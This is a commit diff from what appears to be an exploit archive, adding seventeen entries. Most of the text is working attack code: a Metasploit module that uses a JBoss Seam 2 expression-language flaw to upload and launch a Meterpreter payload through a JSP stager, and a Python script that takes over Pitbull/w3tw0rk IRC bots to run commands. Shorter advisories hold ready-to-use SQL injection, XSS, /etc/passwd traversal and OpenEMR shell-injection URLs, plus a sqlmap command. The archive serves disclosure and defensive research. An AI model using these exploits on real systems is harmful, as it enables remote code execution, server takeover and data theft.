DB: 2015-04-07
17 new exploits
This commit is contained in:
parent
f7fce69883
commit
c7a0ac44ed
18 changed files with 582 additions and 0 deletions
16
files.csv
16
files.csv
|
@ -33047,3 +33047,19 @@ id,file,description,date,author,platform,type,port
|
|||
36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0
|
||||
36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component 'id' Parameter Remote SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component Multiple Remote SQL Injection Vulnerabilities",2012-01-30,the_cyber_nuxbie,php,webapps,0
|
||||
36643,platforms/php/webapps/36643.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0
|
||||
36644,platforms/php/webapps/36644.txt,"4images 1.7.10 admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0
|
||||
36645,platforms/php/webapps/36645.txt,"4images 1.7.10 admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0
|
||||
36646,platforms/php/webapps/36646.txt,"Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection Vulnerability",2012-01-28,the_cyber_nuxbie,php,webapps,0
|
||||
36647,platforms/php/webapps/36647.txt,"Lead Capture 'login.php' Script Cross Site Scripting Vulnerability",2012-01-21,HashoR,php,webapps,0
|
||||
36648,platforms/php/webapps/36648.txt,"OpenEMR <= 4.1 interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
|
||||
36649,platforms/php/webapps/36649.txt,"OpenEMR <= 4.1 interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
|
||||
36650,platforms/php/webapps/36650.txt,"OpenEMR <= 4.1 contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0
|
||||
36651,platforms/php/webapps/36651.txt,"OpenEMR <= 4.1 interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0
|
||||
36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit",2015-04-06,"Jay Turla",multiple,remote,6667
|
||||
36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 File Upload and Execute",2015-04-06,metasploit,jsp,remote,8080
|
||||
36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 'base' Parameter Cross Site Scripting Vulnerability",2012-02-01,andsarmiento,php,webapps,0
|
||||
36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0
|
||||
36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
|
||||
36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter Remote SQL Injection Vulnerability",2012-02-02,"Daniel Godoy",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
310
platforms/jsp/remote/36653.rb
Executable file
310
platforms/jsp/remote/36653.rb
Executable file
|
@ -0,0 +1,310 @@
|
|||
#
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'rex/proto/http'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'JBoss Seam 2 File Upload and Execute',
|
||||
'Description' => %q{
|
||||
Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly
|
||||
sanitize inputs to some JBoss Expression Language expressions. As a
|
||||
result, attackers can gain remote code execution through the
|
||||
application server. This module leverages RCE to upload and execute
|
||||
a meterpreter payload.
|
||||
|
||||
Versions of the JBoss AS admin-console are known to be vulnerable to
|
||||
this exploit, without requiring authentication. Tested against
|
||||
JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.
|
||||
|
||||
This module provides a more efficient method of exploitation - it
|
||||
does not loop to find desired Java classes and methods.
|
||||
|
||||
NOTE: the check for upload success is not 100% accurate.
|
||||
NOTE 2: The module uploads the meterpreter JAR and a JSP to launch
|
||||
it.
|
||||
|
||||
},
|
||||
'Author' => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ],
|
||||
'References' =>
|
||||
[
|
||||
# JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs
|
||||
['CVE', '2010-1871'],
|
||||
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'],
|
||||
['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'],
|
||||
['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html']
|
||||
],
|
||||
'DisclosureDate' => "Aug 05 2010",
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => %w{ java },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Java Universal',
|
||||
{
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'java'
|
||||
},
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
|
||||
OptString.new('CTYPE', [ true, "Content-Type to send with requests", "application/x-www-form-urlencoded"]),
|
||||
OptString.new('TARGETURI', [ true, "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]),
|
||||
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]),
|
||||
OptString.new('FNAME', [ false, "Name of file to create - NO EXTENSION! (default: random)", nil]),
|
||||
OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2")
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}"
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
vprint_debug("Server sent a 302 with location")
|
||||
if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29))
|
||||
report_vuln({
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:name => "#{self.name} - #{uri}",
|
||||
:refs => self.references,
|
||||
:info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource."
|
||||
})
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
else
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
# If we reach this point, we didn't find the service
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
||||
def execute_cmd(cmd)
|
||||
cmd_to_run = Rex::Text.uri_encode(cmd)
|
||||
vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}")
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}"
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess))
|
||||
vprint_status("#{rhost}:#{rport} Exploit successful")
|
||||
else
|
||||
vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
end
|
||||
else
|
||||
vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def call_jsp(jspname)
|
||||
# TODO ugly way to strip off last resource on a path
|
||||
uri = target_uri.path
|
||||
*keep,ignore = uri.split(/\//)
|
||||
keep.push(jspname)
|
||||
uri = keep.join("/")
|
||||
uri = "/" + uri if (uri[0] != "/")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "sessionid=" + Rex::Text.rand_text_alpha(32)
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 200)
|
||||
vprint_status("Successful request to JSP")
|
||||
else
|
||||
vprint_error("Failed to request JSP")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def upload_jsp(filename,jarname)
|
||||
jsp_text = <<EOJSP
|
||||
<%@ page import="java.io.*"
|
||||
%><%@ page import="java.net.*"
|
||||
%><%
|
||||
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()});
|
||||
Class c = cl.loadClass("metasploit.Payload");
|
||||
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
|
||||
%>
|
||||
EOJSP
|
||||
vprint_status("Uploading JSP to launch payload")
|
||||
status = upload_file_chunk(filename,'false',jsp_text)
|
||||
if status
|
||||
vprint_status("JSP uploaded to to #{filename}")
|
||||
else
|
||||
vprint_error("Failed to upload file.")
|
||||
end
|
||||
|
||||
@pl_sent = true
|
||||
end
|
||||
|
||||
|
||||
def upload_file_chunk(filename, append='false', chunk)
|
||||
# create URL-safe Base64-encoded version of chunk
|
||||
b64 = Rex::Text.encode_base64(chunk)
|
||||
b64 = b64.gsub("+","%2b")
|
||||
b64 = b64.gsub("/","%2f")
|
||||
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
# TODO Including the conversationId part in this regex might cause
|
||||
# failure on other Seam applications. Needs more testing
|
||||
if (res.headers['Location'] =~ %r(user=&conversationId))
|
||||
#vprint_status("#{rhost}:#{rport} Exploit successful.")
|
||||
return true
|
||||
else
|
||||
#vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
return false
|
||||
end
|
||||
else
|
||||
#vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def get_full_path(filename)
|
||||
#vprint_debug("Trying to find full path for #{filename}")
|
||||
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}"
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
# the user argument should be set to the result of our call - which
|
||||
# will be the full path of our file
|
||||
matches = /.*user=(.+)\&.*/.match(res.headers['Location'])
|
||||
#vprint_debug("Location is " + res.headers['Location'])
|
||||
if (matches and matches.captures)
|
||||
return Rex::Text::uri_decode(matches.captures[0])
|
||||
else
|
||||
return nil
|
||||
end
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def java_stager(fname, chunk_size)
|
||||
@payload_exe = fname + ".jar"
|
||||
jsp_name = fname + ".jsp"
|
||||
|
||||
#data = payload.encoded_jar.pack
|
||||
data = payload.encoded_jar.pack
|
||||
|
||||
append = 'false'
|
||||
while (data.length > chunk_size)
|
||||
status = upload_file_chunk(@payload_exe, append, data[0, chunk_size])
|
||||
if status
|
||||
vprint_debug("Uploaded chunk")
|
||||
else
|
||||
vprint_error("Failed to upload chunk")
|
||||
break
|
||||
end
|
||||
data = data[chunk_size, data.length - chunk_size]
|
||||
# first chunk is an overwrite, afterwards, we need to append
|
||||
append = 'true'
|
||||
end
|
||||
status = upload_file_chunk(@payload_exe, 'true', data)
|
||||
if status
|
||||
vprint_status("Payload uploaded to " + @payload_exe)
|
||||
else
|
||||
vprint_error("Failed to upload file.")
|
||||
end
|
||||
|
||||
# write a JSP that can call the payload in the jar
|
||||
upload_jsp(jsp_name, @payload_exe)
|
||||
|
||||
pe_path = get_full_path(@payload_exe) || @payload_exe
|
||||
jsp_path = get_full_path(jsp_name) || jsp_name
|
||||
# try to clean up our stuff;
|
||||
register_files_for_cleanup(pe_path, jsp_path)
|
||||
|
||||
# call the JSP to launch the payload
|
||||
call_jsp(jsp_name)
|
||||
end
|
||||
|
||||
def exploit
|
||||
@pl_sent = false
|
||||
|
||||
if check == Exploit::CheckCode::Vulnerable
|
||||
|
||||
fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8))
|
||||
|
||||
vprint_status("#{rhost}:#{rport} Host is vulnerable")
|
||||
vprint_status("#{rhost}:#{rport} Uploading file...")
|
||||
|
||||
# chunking code based on struts_code_exec_exception_delegator
|
||||
append = 'false'
|
||||
chunk_size = datastore['CHUNKSIZE']
|
||||
# sanity check
|
||||
if (chunk_size <= 0)
|
||||
vprint_error("Invalid chunk size #{chunk_size}")
|
||||
return
|
||||
end
|
||||
|
||||
vprint_debug("Sending in chunks of #{chunk_size}")
|
||||
|
||||
case target['Platform']
|
||||
when 'java'
|
||||
java_stager(fname, chunk_size)
|
||||
else
|
||||
fail_with(Failure::NoTarget, 'Unsupported target platform!')
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
end
|
||||
end
|
45
platforms/multiple/remote/36652.py
Executable file
45
platforms/multiple/remote/36652.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
# thehunter.py
|
||||
# Exploit Title: Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution
|
||||
# Author: Jay Turla ( @shipcod3 )
|
||||
# Description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
def usage():
|
||||
print("USAGE: python thehunter.py nick \n")
|
||||
|
||||
def main(argv):
|
||||
|
||||
if len(argv) < 2:
|
||||
return usage()
|
||||
|
||||
#irc server connection settings
|
||||
botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot
|
||||
server = "us.dal.net" #irc server
|
||||
channel = "#buhaypirata" #channel where the bot is located
|
||||
|
||||
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
|
||||
print "connecting to:"+server
|
||||
irc.connect((server, 6667)) #connects to the server
|
||||
irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication
|
||||
irc.send("NICK "+ botnick +"\n") #sets nick
|
||||
irc.send("JOIN "+ channel +"\n") #join the chan
|
||||
irc.send("PRIVMSG "+channel+" :!bot @system 'uname -a' \n") #send the payload to the bot
|
||||
|
||||
while 1: #puts it in a loop
|
||||
text=irc.recv(2040) #receive the text
|
||||
print text #print text to console
|
||||
|
||||
if text.find('PING') != -1: #check if 'PING' is found
|
||||
irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)
|
||||
if text.find('!quit') != -1: #quit the Bot
|
||||
irc.send ("QUIT\r\n")
|
||||
sys.exit()
|
||||
if text.find('Linux') != -1:
|
||||
irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
|
||||
irc.send ("QUIT\r\n")
|
||||
sys.exit()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main(sys.argv)
|
74
platforms/php/webapps/36413.txt
Executable file
74
platforms/php/webapps/36413.txt
Executable file
|
@ -0,0 +1,74 @@
|
|||
Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
|
||||
Version/s Tested: 1.7.3.3
|
||||
Patched Version: 1.7.4
|
||||
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
|
||||
CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
|
||||
WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
|
||||
|
||||
Description:
|
||||
|
||||
WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
|
||||
to improve the Search Engine Optimization (SEO) of WordPress sites. The
|
||||
latest version at the time of writing (1.7.3.3) has been found to be
|
||||
affected by two authenticated (admin, editor or author user) Blind SQL
|
||||
Injection vulnerabilities. The plugin has more than one million downloads
|
||||
according to WordPress.
|
||||
|
||||
Technical Description:
|
||||
|
||||
The authenticated Blind SQL Injection vulnerability can be found within the
|
||||
'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
|
||||
parameters are not sufficiently sanitised before being used within a SQL
|
||||
query.
|
||||
|
||||
Line 529:
|
||||
|
||||
$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
|
||||
$_GET['orderby'] ) ) : 'post_title';
|
||||
|
||||
Line 533:
|
||||
|
||||
order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
|
||||
|
||||
If the GET orderby parameter value is not empty it will pass its value
|
||||
through WordPess's own esc_sql() function. According to WordPress this
|
||||
function 'Prepares a string for use as an SQL query. A glorified
|
||||
addslashes() that works with arrays.'. However, this is not sufficient to
|
||||
prevent SQL Injection as can be seen from our Proof of Concept.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
|
||||
The following GET request will cause the SQL query to execute and sleep for
|
||||
10 seconds if clicked on as an authenticated admin, editor or author user.
|
||||
|
||||
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
|
||||
|
||||
Using SQLMap:
|
||||
|
||||
python sqlmap.py -u "
|
||||
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
|
||||
--batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
|
||||
wordpress_logged_in_9dee67...;"
|
||||
|
||||
Impact:
|
||||
|
||||
As there is no anti-CSRF protection a remote unauthenticated attacker could
|
||||
use this vulnerability to execute arbitrary SQL queries on the victim
|
||||
WordPress web site by enticing an authenticated admin, editor or author
|
||||
user to click on a specially crafted link or visit a page they control.
|
||||
|
||||
One possible attack scenario would be an attacker adding their own
|
||||
administrative user to the target WordPress site, allowing them to
|
||||
compromise the entire web site.
|
||||
|
||||
Timeline:
|
||||
|
||||
March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
|
||||
(WPScan Team - Dewhurst Security).
|
||||
March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
|
||||
March 10th 2015 - 20:00 GMT: Vendor contacted via email.
|
||||
March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
|
||||
expected patch timeline.
|
||||
March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
|
||||
this issue.
|
||||
March 11th 2015 - 12:30 GMT: Advisory released.
|
9
platforms/php/webapps/36642.txt
Executable file
9
platforms/php/webapps/36642.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51730/info
|
||||
|
||||
The 'com_bbs' component for Joomla! is prone to multiple remote SQL-injection vulnerabilities.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_bbs&bid=[SQLi]
|
||||
http://www.example.com/index.php?option=com_bbs&task=list&bid=[SQLi]
|
||||
http://www.example.com/index.php?option=com_bbs&Itemid=xxx&task=search&search_type=[SQLi]
|
13
platforms/php/webapps/36643.txt
Executable file
13
platforms/php/webapps/36643.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/51774/info
|
||||
|
||||
4images is prone to multiple input-validation vulnerabilities including:
|
||||
|
||||
1. A cross-site scripting vulnerability.
|
||||
2. An open-redirection vulnerability.
|
||||
3. An SQL-injection vulnerability.
|
||||
|
||||
An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
|
||||
|
||||
4images 1.7.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1' (SQL Injection)
|
13
platforms/php/webapps/36644.txt
Executable file
13
platforms/php/webapps/36644.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/51774/info
|
||||
|
||||
4images is prone to multiple input-validation vulnerabilities including:
|
||||
|
||||
1. A cross-site scripting vulnerability.
|
||||
2. An open-redirection vulnerability.
|
||||
3. An SQL-injection vulnerability.
|
||||
|
||||
An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
|
||||
|
||||
4images 1.7.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/categories.php?action=addcat&cat_parent_id=1 (XSS)
|
13
platforms/php/webapps/36645.txt
Executable file
13
platforms/php/webapps/36645.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/51774/info
|
||||
|
||||
4images is prone to multiple input-validation vulnerabilities including:
|
||||
|
||||
1. A cross-site scripting vulnerability.
|
||||
2. An open-redirection vulnerability.
|
||||
3. An SQL-injection vulnerability.
|
||||
|
||||
An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
|
||||
|
||||
4images 1.7.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/index.php?__csrf=931086345abbb83f9a70c87dc4719248& action=login&redirect=http://google.com&loginusername=admin&loginpassword=pass
|
7
platforms/php/webapps/36646.txt
Executable file
7
platforms/php/webapps/36646.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51779/info
|
||||
|
||||
The 'com_cmotour' component for Joomla! is prone to an SQL injection vulnerability.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?index.php?option=com_cmotour&task=cat&Itemid=xxx&id=[SQL Injection]
|
7
platforms/php/webapps/36647.txt
Executable file
7
platforms/php/webapps/36647.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51785/info
|
||||
|
||||
Lead Capture is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/admin/login.php?message=[XSS]
|
9
platforms/php/webapps/36648.txt
Executable file
9
platforms/php/webapps/36648.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51788/info
|
||||
|
||||
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/interface/patient_file/encounter/trend_form.php?formname=../../../etc/passwd%00
|
9
platforms/php/webapps/36649.txt
Executable file
9
platforms/php/webapps/36649.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51788/info
|
||||
|
||||
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/interface/patient_file/encounter/load_form.php?formname=../../../etc/passwd%00
|
9
platforms/php/webapps/36650.txt
Executable file
9
platforms/php/webapps/36650.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51788/info
|
||||
|
||||
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/contrib/acog/print_form.php?formname=../../../etc/passwd%00
|
9
platforms/php/webapps/36651.txt
Executable file
9
platforms/php/webapps/36651.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/51788/info
|
||||
|
||||
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/interface/fax/fax_dispatch.php?file=1%22%20||%20ls%20%3E%20123
|
10
platforms/php/webapps/36654.txt
Executable file
10
platforms/php/webapps/36654.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/51793/info
|
||||
|
||||
phpLDAPadmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
phpLDAPadmin 1.2.2 is affected; other versions may also be vulnerable.
|
||||
|
||||
http://www.example.com/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&format=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub&
|
||||
filter=objectClass%3D* display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search
|
11
platforms/php/webapps/36655.txt
Executable file
11
platforms/php/webapps/36655.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/51794/info
|
||||
|
||||
phpLDAPadmin is prone to cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
phpLDAPadmin 1.2.0.5-2 is affected; other versions may also be vulnerable.
|
||||
|
||||
https://www.example.com/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>
|
||||
|
||||
https://www.example.com/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false
|
11
platforms/php/webapps/36656.txt
Executable file
11
platforms/php/webapps/36656.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/51799/info
|
||||
|
